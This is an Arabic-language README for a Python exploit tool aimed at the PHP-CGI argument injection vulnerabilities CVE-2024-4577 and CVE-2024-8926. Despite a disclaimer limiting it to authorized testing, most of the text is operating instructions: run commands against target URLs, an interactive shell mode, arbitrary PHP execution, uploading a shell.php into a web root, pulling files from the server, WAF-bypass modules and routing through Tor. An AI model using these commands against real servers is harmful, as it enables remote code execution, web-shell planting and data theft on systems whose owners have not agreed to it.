
أداة اختبار اختراق أمني لـ CVE-2024-4577 و CVE-2024-8926
🚀 أداة استغلال الثغرات CVE-2024-4577 & CVE-2024-8926
أداة اختبار آلية لثغرة حقن المعاملات في PHP-CGI، تدعم CVE-2024-4577 و CVE-2024-8926، وتتيح عمليات تنفيذ الأوامر، رفع الملفات، تنزيلها وغيرها.
يمكن استخدام هذه الأداة لاختبار ثغرات حقن المعاملات في بيئة PHP-CGI، وتوفر:
هذه الأداة مخصصة للاختبارات المشروعة والأغراض الأكاديمية فقط، يُحظر استخدامها على أنظمة غير مصرح بها!
⚠️ الاستخدام غير القانوني يعرضك للمسؤولية القانونية!
هذه الأداة مخصصة فقط لـ:
تعتمد هذه الأداة على حزم Python التالية، يرجى تثبيتها أولاً:
pip install -r requirements.txt
أو التثبيت اليدوي:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
أمثلة:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
عندما يجد السكريبت ثغرة، يعرض قائمة:
╭──────────── قائمة وضع الاستغلال ────────────╮
│ الهدف الحالي: http://example.com/ │
│ نقطة الحقن الحالية: /php-cgi/php-cgi.exe │
│ رقم الثغرة: CVE-2024-4577 │
╰─────────────────────────────────────────────────╯
1) 🧪 وضع Shell
2) 🛠️ وضع PHP مخصص
3) 📤 رفع ملف
4) 📥 تنزيل ملف
5) 🎯 تبديل الهدف
6) ⚙️ إعدادات المعاملات
7) ❌ خروج
>>
تنفيذ أوامر النظام:
shell> whoami
📂 حفظ المخرجات
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
تنفيذ كود PHP مخصص:
phpinfo();
EOF
📂 حفظ المخرجات
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
مسار الملف المحلي: C:\test\shell.php
المسار الكامل للهدف:
[*] تم تعيين مسار الرفع تلقائياً إلى: C:/xampp/htdocs/shell.php
📂 تحديد المسار يدوياً
المسار الكامل للهدف: C:\xampp\php\shell.php
مسار الملف البعيد: C:\xampp\htdocs\index.php
📂 يُحفظ الملف في download/، وإذا كان موجوداً، يُضاف رقم تلقائي
[*] تم تنزيل الملف، محفوظ في download/index.php
أدخل عنوان الهدف الجديد: http://newtarget.com
🔹 سيتم إعادة اختبار الثغرة
[⚙️ قائمة إعدادات مرحلة الاستغلال]
1) تبديل الحمولة (Payload) 1
2) وحدة التجاوز (Bypass) غير محدد
3) مهلة الانتظار (Timeout) 10 ثوانٍ
4) تأخير الطلب (Delay) 0 ثوانٍ
5) التسجيل التلقائي (Log) مغلق
6) الوضع المفصل (Verbose) مغلق
7) التأثيرات المتحركة (Effects) مفعل
8) الاستغلال الإجباري (Force) مغلق
9) حفظ والعودة إلى قائمة الاستغلال
توفر الاستراتيجيات التالية للتجاوز:
php://input بصيغ أخرى| المعامل | الوصف | مثال |
|---|
-u أو --url | تحديد عنوان الهدف | -u http://example.com |
--timeout sec | تعيين مهلة الطلب (0 للا نهائي) | --timeout 30 |
--log | تسجيل أوامر shell تلقائياً | --log |
--payload | تحديد أو تخصيص مجموعة الحمولات | --payload 2 |
--tor | إرسال الطلبات عبر Tor | --tor |
--verbose | عرض معلومات مفصلة | --verbose |
--bypass | تفعيل وضع تجاوز WAF | --bypass |
--force | الدخول القسري لوضع الاستغلال | --force |
--cgipoint PATHS | تحديد مسارات CGI محددة للاختبار | --cgipoint /path |
--delay sec | تأخير بالثواني بين الطلبات | --delay 1.5 |
--no-effects | إيقاف جميع التأثيرات المتحركة والتأخير | --no-effects |